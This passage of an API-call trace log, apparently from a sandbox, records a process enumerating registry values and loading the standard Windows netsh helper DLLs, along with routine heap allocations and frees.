dwFlags=0x0, lpMem=0x2f6f50 | out: hHeap=0x2c0000) returned 1 [0161.512] RegEnumValueW (in: hKey=0x90, dwIndex=0x6, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="authfwcfg", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0161.512] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxmontr.dll") returned -8 [0161.512] _wcsicmp (_String1="authfwcfg.dll", _String2="ipxpromn.dll") returned -8 [0161.512] GetProcessHeap () returned 0x2c0000 [0161.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x140) returned 0x2f6bd0 [0161.512] GetProcessHeap () returned 0x2c0000 [0161.512] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2f36d0 [0161.513] GetProcessHeap () returned 0x2c0000 [0161.513] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1c) returned 0x2f6750 [0161.513] _wcsupr (in: _String="authfwcfg.dll" | out: _String="AUTHFWCFG.DLL") returned="AUTHFWCFG.DLL" [0161.513] GetProcessHeap () returned 0x2c0000 [0161.513] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f5f60 | out: hHeap=0x2c0000) returned 1 [0161.513] LoadLibraryW (lpLibFileName="AUTHFWCFG.DLL") returned 0x7fef36a0000 [0165.831] GetProcAddress (hModule=0x7fef36a0000, lpProcName="InitHelperDll") returned 0x7fef36a5d20 [0165.831] InitHelperDll () returned 0x0 [0167.993] RegisterHelper () returned 0x0 [0167.993] GetProcessHeap () returned 0x2c0000 [0167.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x478) returned 0x2fe7d0 [0167.993] GetProcessHeap () returned 0x2c0000 [0167.993] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb320 | out: hHeap=0x2c0000) returned 1 [0167.993] RegisterHelper () returned 0x0 [0167.993] GetProcessHeap () returned 0x2c0000 [0167.993] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4d0) returned 0x2fec50 [0167.994] GetProcessHeap () returned 0x2c0000 [0167.994] HeapFree (in: hHeap=0x2c0000, 
dwFlags=0x0, lpMem=0x2fe7d0 | out: hHeap=0x2c0000) returned 1 [0167.994] RegisterHelper () returned 0x0 [0167.994] GetProcessHeap () returned 0x2c0000 [0167.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x528) returned 0x2ff130 [0167.995] GetProcessHeap () returned 0x2c0000 [0167.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fec50 | out: hHeap=0x2c0000) returned 1 [0167.996] RegisterHelper () returned 0x0 [0167.996] GetProcessHeap () returned 0x2c0000 [0167.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x580) returned 0x2fe7d0 [0167.996] GetProcessHeap () returned 0x2c0000 [0167.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff130 | out: hHeap=0x2c0000) returned 1 [0167.996] RegisterHelper () returned 0x0 [0167.996] GetProcessHeap () returned 0x2c0000 [0167.996] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x5d8) returned 0x2fed60 [0167.996] GetProcessHeap () returned 0x2c0000 [0167.996] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe7d0 | out: hHeap=0x2c0000) returned 1 [0167.996] RegEnumValueW (in: hKey=0x90, dwIndex=0x7, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="2", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0167.996] _wcsicmp (_String1="ifmon.dll", _String2="ipxmontr.dll") returned -10 [0167.997] _wcsicmp (_String1="ifmon.dll", _String2="ipxpromn.dll") returned -10 [0167.997] GetProcessHeap () returned 0x2c0000 [0167.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x168) returned 0x2f7170 [0167.997] GetProcessHeap () returned 0x2c0000 [0167.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x2f1180 [0167.997] GetProcessHeap () returned 0x2c0000 [0167.997] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x2fe200 [0167.997] _wcsupr (in: _String="ifmon.dll" | out: _String="IFMON.DLL") returned="IFMON.DLL" [0167.997] 
GetProcessHeap () returned 0x2c0000 [0167.997] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6bd0 | out: hHeap=0x2c0000) returned 1 [0167.997] LoadLibraryW (lpLibFileName="IFMON.DLL") returned 0x7fef92c0000 [0169.883] GetProcAddress (hModule=0x7fef92c0000, lpProcName="InitHelperDll") returned 0x7fef92c1924 [0169.883] InitHelperDll () returned 0x0 [0169.883] RegisterHelper () returned 0x0 [0169.883] GetProcessHeap () returned 0x2c0000 [0169.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x630) returned 0x300b40 [0169.884] GetProcessHeap () returned 0x2c0000 [0169.884] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fed60 | out: hHeap=0x2c0000) returned 1 [0169.884] RegEnumValueW (in: hKey=0x90, dwIndex=0x8, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="netiohlp", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0169.884] _wcsicmp (_String1="netiohlp.dll", _String2="ipxmontr.dll") returned 5 [0169.884] _wcsicmp (_String1="netiohlp.dll", _String2="ipxpromn.dll") returned 5 [0169.884] GetProcessHeap () returned 0x2c0000 [0169.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x190) returned 0x2fb3f0 [0169.885] GetProcessHeap () returned 0x2c0000 [0169.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe320 [0169.885] GetProcessHeap () returned 0x2c0000 [0169.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x2ffa00 [0169.885] _wcsupr (in: _String="netiohlp.dll" | out: _String="NETIOHLP.DLL") returned="NETIOHLP.DLL" [0169.885] GetProcessHeap () returned 0x2c0000 [0169.885] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f7170 | out: hHeap=0x2c0000) returned 1 [0169.885] LoadLibraryW (lpLibFileName="NETIOHLP.DLL") returned 0x7fef3660000 [0173.124] GetProcAddress (hModule=0x7fef3660000, lpProcName="InitHelperDll") returned 0x7fef367ce30 [0173.124] InitHelperDll () 
returned 0x0 [0173.124] RegisterHelper () returned 0x0 [0173.124] GetProcessHeap () returned 0x2c0000 [0173.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x688) returned 0x301180 [0173.125] GetProcessHeap () returned 0x2c0000 [0173.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x300b40 | out: hHeap=0x2c0000) returned 1 [0173.125] RegisterHelper () returned 0x0 [0173.125] GetProcessHeap () returned 0x2c0000 [0173.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x6e0) returned 0x301810 [0173.125] GetProcessHeap () returned 0x2c0000 [0173.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301180 | out: hHeap=0x2c0000) returned 1 [0173.125] RegisterHelper () returned 0x0 [0173.125] GetProcessHeap () returned 0x2c0000 [0173.125] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x738) returned 0x300b40 [0173.125] GetProcessHeap () returned 0x2c0000 [0173.125] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301810 | out: hHeap=0x2c0000) returned 1 [0173.126] RegisterHelper () returned 0x0 [0173.126] GetProcessHeap () returned 0x2c0000 [0173.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x790) returned 0x301280 [0173.126] GetProcessHeap () returned 0x2c0000 [0173.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x300b40 | out: hHeap=0x2c0000) returned 1 [0173.126] RegisterHelper () returned 0x0 [0173.126] GetProcessHeap () returned 0x2c0000 [0173.126] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7e8) returned 0x301a20 [0173.126] GetProcessHeap () returned 0x2c0000 [0173.126] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301280 | out: hHeap=0x2c0000) returned 1 [0173.127] RegisterHelper () returned 0x0 [0173.127] GetProcessHeap () returned 0x2c0000 [0173.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x302210 [0173.127] GetProcessHeap () returned 0x2c0000 [0173.127] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301a20 | out: hHeap=0x2c0000) returned 1 [0173.127] 
RegisterHelper () returned 0x0 [0173.127] GetProcessHeap () returned 0x2c0000 [0173.127] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x898) returned 0x300b40 [0173.127] GetProcessHeap () returned 0x2c0000 [0173.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302210 | out: hHeap=0x2c0000) returned 1 [0173.128] RegisterHelper () returned 0x0 [0173.128] GetProcessHeap () returned 0x2c0000 [0173.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8f0) returned 0x3013e0 [0173.128] GetProcessHeap () returned 0x2c0000 [0173.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x300b40 | out: hHeap=0x2c0000) returned 1 [0173.128] RegisterHelper () returned 0x0 [0173.128] GetProcessHeap () returned 0x2c0000 [0173.128] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x948) returned 0x301ce0 [0173.128] GetProcessHeap () returned 0x2c0000 [0173.128] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3013e0 | out: hHeap=0x2c0000) returned 1 [0173.129] RegEnumValueW (in: hKey=0x90, dwIndex=0x9, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="whhelper", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0173.129] _wcsicmp (_String1="whhelper.dll", _String2="ipxmontr.dll") returned 14 [0173.129] _wcsicmp (_String1="whhelper.dll", _String2="ipxpromn.dll") returned 14 [0173.129] GetProcessHeap () returned 0x2c0000 [0173.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1b8) returned 0x2fb590 [0173.129] GetProcessHeap () returned 0x2c0000 [0173.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe360 [0173.129] GetProcessHeap () returned 0x2c0000 [0173.129] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x2feb60 [0173.129] _wcsupr (in: _String="whhelper.dll" | out: _String="WHHELPER.DLL") returned="WHHELPER.DLL" [0173.130] GetProcessHeap () returned 0x2c0000 [0173.130] 
HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb3f0 | out: hHeap=0x2c0000) returned 1 [0173.130] LoadLibraryW (lpLibFileName="WHHELPER.DLL") returned 0x7fef4c20000 [0174.977] GetProcAddress (hModule=0x7fef4c20000, lpProcName="InitHelperDll") returned 0x7fef4c2210c [0174.977] InitHelperDll () returned 0x0 [0174.977] RegisterHelper () returned 0x0 [0174.977] GetProcessHeap () returned 0x2c0000 [0174.977] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9a0) returned 0x302630 [0174.978] GetProcessHeap () returned 0x2c0000 [0174.978] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x301ce0 | out: hHeap=0x2c0000) returned 1 [0174.978] RegEnumValueW (in: hKey=0x90, dwIndex=0xa, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="hnetmon", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0174.978] _wcsicmp (_String1="hnetmon.dll", _String2="ipxmontr.dll") returned -1 [0174.978] _wcsicmp (_String1="hnetmon.dll", _String2="ipxpromn.dll") returned -1 [0174.979] GetProcessHeap () returned 0x2c0000 [0174.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x2fefd0 [0174.979] GetProcessHeap () returned 0x2c0000 [0174.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2fe380 [0174.979] GetProcessHeap () returned 0x2c0000 [0174.979] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2fe3a0 [0174.979] _wcsupr (in: _String="hnetmon.dll" | out: _String="HNETMON.DLL") returned="HNETMON.DLL" [0174.980] GetProcessHeap () returned 0x2c0000 [0174.980] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb590 | out: hHeap=0x2c0000) returned 1 [0174.980] LoadLibraryW (lpLibFileName="HNETMON.DLL") returned 0x7fef4c10000 [0181.132] GetProcAddress (hModule=0x7fef4c10000, lpProcName="InitHelperDll") returned 0x7fef4c122a4 [0181.132] InitHelperDll () returned 0x0 [0181.132] RegisterHelper () returned 
0x0 [0181.132] GetProcessHeap () returned 0x2c0000 [0181.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9f8) returned 0x302fe0 [0181.133] GetProcessHeap () returned 0x2c0000 [0181.133] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302630 | out: hHeap=0x2c0000) returned 1 [0181.133] RegEnumValueW (in: hKey=0x90, dwIndex=0xb, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="rpc", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0181.133] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxmontr.dll") returned 9 [0181.133] _wcsicmp (_String1="rpcnsh.dll", _String2="ipxpromn.dll") returned 9 [0181.133] GetProcessHeap () returned 0x2c0000 [0181.133] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x208) returned 0x3039e0 [0181.134] GetProcessHeap () returned 0x2c0000 [0181.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x2f7300 [0181.134] GetProcessHeap () returned 0x2c0000 [0181.134] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16) returned 0x2fe420 [0181.134] _wcsupr (in: _String="rpcnsh.dll" | out: _String="RPCNSH.DLL") returned="RPCNSH.DLL" [0181.134] GetProcessHeap () returned 0x2c0000 [0181.134] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fefd0 | out: hHeap=0x2c0000) returned 1 [0181.135] LoadLibraryW (lpLibFileName="RPCNSH.DLL") returned 0x7fef4c00000 [0181.526] GetProcAddress (hModule=0x7fef4c00000, lpProcName="InitHelperDll") returned 0x7fef4c02e88 [0181.527] InitHelperDll () returned 0x0 [0181.527] RegisterHelper () returned 0x0 [0181.527] GetProcessHeap () returned 0x2c0000 [0181.527] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa50) returned 0x302340 [0181.527] GetProcessHeap () returned 0x2c0000 [0181.527] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302fe0 | out: hHeap=0x2c0000) returned 1 [0181.527] RegisterHelper () returned 0x0 [0181.527] GetProcessHeap () 
returned 0x2c0000 [0181.528] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xaa8) returned 0x302da0 [0181.528] GetProcessHeap () returned 0x2c0000 [0181.528] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302340 | out: hHeap=0x2c0000) returned 1 [0181.529] RegEnumValueW (in: hKey=0x90, dwIndex=0xc, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="dot3cfg", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0181.529] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxmontr.dll") returned -5 [0181.529] _wcsicmp (_String1="dot3cfg.dll", _String2="ipxpromn.dll") returned -5 [0181.529] GetProcessHeap () returned 0x2c0000 [0181.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x230) returned 0x2fefd0 [0181.530] GetProcessHeap () returned 0x2c0000 [0181.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x2fe440 [0181.530] GetProcessHeap () returned 0x2c0000 [0181.530] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x2fe460 [0181.530] _wcsupr (in: _String="dot3cfg.dll" | out: _String="DOT3CFG.DLL") returned="DOT3CFG.DLL" [0181.530] GetProcessHeap () returned 0x2c0000 [0181.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3039e0 | out: hHeap=0x2c0000) returned 1 [0181.531] LoadLibraryW (lpLibFileName="DOT3CFG.DLL") returned 0x7fef4be0000 [0183.906] GetProcAddress (hModule=0x7fef4be0000, lpProcName="InitHelperDll") returned 0x7fef4be390c [0183.906] InitHelperDll () returned 0x0 [0183.906] RegisterHelper () returned 0x0 [0183.906] GetProcessHeap () returned 0x2c0000 [0183.906] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb00) returned 0x304c60 [0183.907] GetProcessHeap () returned 0x2c0000 [0183.907] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x302da0 | out: hHeap=0x2c0000) returned 1 [0183.907] RegEnumValueW (in: hKey=0x90, dwIndex=0xd, lpValueName=0x2e2340, 
lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="napmontr", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0183.907] _wcsicmp (_String1="napmontr.dll", _String2="ipxmontr.dll") returned 5 [0183.908] _wcsicmp (_String1="napmontr.dll", _String2="ipxpromn.dll") returned 5 [0183.908] GetProcessHeap () returned 0x2c0000 [0183.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x258) returned 0x305770 [0183.908] GetProcessHeap () returned 0x2c0000 [0183.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe500 [0183.908] GetProcessHeap () returned 0x2c0000 [0183.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x302760 [0183.908] _wcsupr (in: _String="napmontr.dll" | out: _String="NAPMONTR.DLL") returned="NAPMONTR.DLL" [0183.909] GetProcessHeap () returned 0x2c0000 [0183.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fefd0 | out: hHeap=0x2c0000) returned 1 [0183.909] LoadLibraryW (lpLibFileName="NAPMONTR.DLL") returned 0x7fef3450000 [0189.238] GetProcAddress (hModule=0x7fef3450000, lpProcName="InitHelperDll") returned 0x7fef346048c [0189.238] InitHelperDll () returned 0x0 [0189.238] RegisterHelper () returned 0x0 [0189.238] GetProcessHeap () returned 0x2c0000 [0189.238] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb58) returned 0x3059d0 [0189.240] GetProcessHeap () returned 0x2c0000 [0189.240] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x304c60 | out: hHeap=0x2c0000) returned 1 [0189.240] RegisterHelper () returned 0x0 [0189.240] GetProcessHeap () returned 0x2c0000 [0189.240] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xbb0) returned 0x306530 [0189.241] GetProcessHeap () returned 0x2c0000 [0189.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3059d0 | out: hHeap=0x2c0000) returned 1 [0189.242] RegisterHelper () returned 0x0 [0189.242] GetProcessHeap () returned 0x2c0000 
[0189.242] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc08) returned 0x3070f0 [0189.242] GetProcessHeap () returned 0x2c0000 [0189.242] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x306530 | out: hHeap=0x2c0000) returned 1 [0189.243] RegEnumValueW (in: hKey=0x90, dwIndex=0xe, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="nshipsec", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0189.243] _wcsicmp (_String1="nshipsec.dll", _String2="ipxmontr.dll") returned 5 [0189.243] _wcsicmp (_String1="nshipsec.dll", _String2="ipxpromn.dll") returned 5 [0189.243] GetProcessHeap () returned 0x2c0000 [0189.243] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x280) returned 0x307d00 [0189.244] GetProcessHeap () returned 0x2c0000 [0189.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe5c0 [0189.244] GetProcessHeap () returned 0x2c0000 [0189.244] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x302f30 [0189.244] _wcsupr (in: _String="nshipsec.dll" | out: _String="NSHIPSEC.DLL") returned="NSHIPSEC.DLL" [0189.244] GetProcessHeap () returned 0x2c0000 [0189.244] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x305770 | out: hHeap=0x2c0000) returned 1 [0189.245] LoadLibraryW (lpLibFileName="NSHIPSEC.DLL") returned 0x7fef4cf0000 [0196.039] GetProcAddress (hModule=0x7fef4cf0000, lpProcName="InitHelperDll") returned 0x7fef4cf6230 [0196.039] InitHelperDll () returned 0x0 [0196.039] RegisterHelper () returned 0x0 [0196.039] GetProcessHeap () returned 0x2c0000 [0196.039] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc60) returned 0x309f90 [0196.040] GetProcessHeap () returned 0x2c0000 [0196.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3070f0 | out: hHeap=0x2c0000) returned 1 [0196.041] RegisterHelper () returned 0x0 [0196.041] GetProcessHeap () returned 0x2c0000 [0196.041] 
RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xcb8) returned 0x30ac00 [0196.041] GetProcessHeap () returned 0x2c0000 [0196.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x309f90 | out: hHeap=0x2c0000) returned 1 [0196.041] RegisterHelper () returned 0x0 [0196.041] GetProcessHeap () returned 0x2c0000 [0196.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd10) returned 0x30b8c0 [0196.042] GetProcessHeap () returned 0x2c0000 [0196.042] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30ac00 | out: hHeap=0x2c0000) returned 1 [0196.869] RegEnumValueW (in: hKey=0x90, dwIndex=0xf, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="nettrace", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0196.869] _wcsicmp (_String1="nettrace.dll", _String2="ipxmontr.dll") returned 5 [0196.869] _wcsicmp (_String1="nettrace.dll", _String2="ipxpromn.dll") returned 5 [0196.869] GetProcessHeap () returned 0x2c0000 [0196.869] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2a8) returned 0x307460 [0196.869] GetProcessHeap () returned 0x2c0000 [0196.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe7a0 [0196.870] GetProcessHeap () returned 0x2c0000 [0196.870] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x305da0 [0196.870] _wcsupr (in: _String="nettrace.dll" | out: _String="NETTRACE.DLL") returned="NETTRACE.DLL" [0196.870] GetProcessHeap () returned 0x2c0000 [0196.870] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307d00 | out: hHeap=0x2c0000) returned 1 [0196.870] LoadLibraryW (lpLibFileName="NETTRACE.DLL") returned 0x7fef3250000 [0204.639] GetProcAddress (hModule=0x7fef3250000, lpProcName="InitHelperDll") returned 0x7fef3297360 [0204.639] InitHelperDll () returned 0x0 [0204.639] RegisterHelper () returned 0x0 [0204.639] GetProcessHeap () returned 0x2c0000 [0204.640] RtlAllocateHeap 
(HeapHandle=0x2c0000, Flags=0x0, Size=0xd68) returned 0x3104a0 [0204.640] GetProcessHeap () returned 0x2c0000 [0204.640] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30b8c0 | out: hHeap=0x2c0000) returned 1 [0204.640] RegEnumValueW (in: hKey=0x90, dwIndex=0x10, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="WcnNetsh", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0204.640] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxmontr.dll") returned 14 [0204.640] _wcsicmp (_String1="WcnNetsh.dll", _String2="ipxpromn.dll") returned 14 [0204.640] GetProcessHeap () returned 0x2c0000 [0204.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2d0) returned 0x30b890 [0204.641] GetProcessHeap () returned 0x2c0000 [0204.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe6a0 [0204.641] GetProcessHeap () returned 0x2c0000 [0204.641] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x3102b0 [0204.641] _wcsupr (in: _String="WcnNetsh.dll" | out: _String="WCNNETSH.DLL") returned="WCNNETSH.DLL" [0204.641] GetProcessHeap () returned 0x2c0000 [0204.641] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x307460 | out: hHeap=0x2c0000) returned 1 [0204.641] LoadLibraryW (lpLibFileName="WCNNETSH.DLL") returned 0x7fef4c50000 [0206.365] GetProcAddress (hModule=0x7fef4c50000, lpProcName="InitHelperDll") returned 0x7fef4c528e4 [0206.365] InitHelperDll () returned 0x0 [0206.365] RegisterHelper () returned 0x0 [0206.365] GetProcessHeap () returned 0x2c0000 [0206.365] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xdc0) returned 0x312620 [0206.366] GetProcessHeap () returned 0x2c0000 [0206.366] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3104a0 | out: hHeap=0x2c0000) returned 1 [0206.366] RegEnumValueW (in: hKey=0x90, dwIndex=0x11, lpValueName=0x2e2340, lpcchValueName=0x1474a0, lpReserved=0x0, 
lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8 | out: lpValueName="p2pnetsh", lpcchValueName=0x1474a0, lpType=0x0, lpData=0x2de090, lpcbData=0x1474e8) returned 0x0 [0206.367] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxmontr.dll") returned 7 [0206.367] _wcsicmp (_String1="p2pnetsh.dll", _String2="ipxpromn.dll") returned 7 [0206.367] GetProcessHeap () returned 0x2c0000 [0206.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2f8) returned 0x307460 [0206.367] GetProcessHeap () returned 0x2c0000 [0206.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x12) returned 0x2fe6c0 [0206.367] GetProcessHeap () returned 0x2c0000 [0206.367] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1a) returned 0x30be70 [0206.367] _wcsupr (in: _String="p2pnetsh.dll" | out: _String="P2PNETSH.DLL") returned="P2PNETSH.DLL" [0206.367] GetProcessHeap () returned 0x2c0000 [0206.367] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x30b890 | out: hHeap=0x2c0000) returned 1 [0206.367] LoadLibraryW (lpLibFileName="P2PNETSH.DLL") returned 0x7fef4b20000 [0210.235] GetProcAddress (hModule=0x7fef4b20000, lpProcName="InitHelperDll") returned 0x7fef4b25568 [0210.235] InitHelperDll () returned 0x0 [0210.235] RegisterHelper () returned 0x0 [0210.235] GetProcessHeap () returned 0x2c0000 [0210.235] 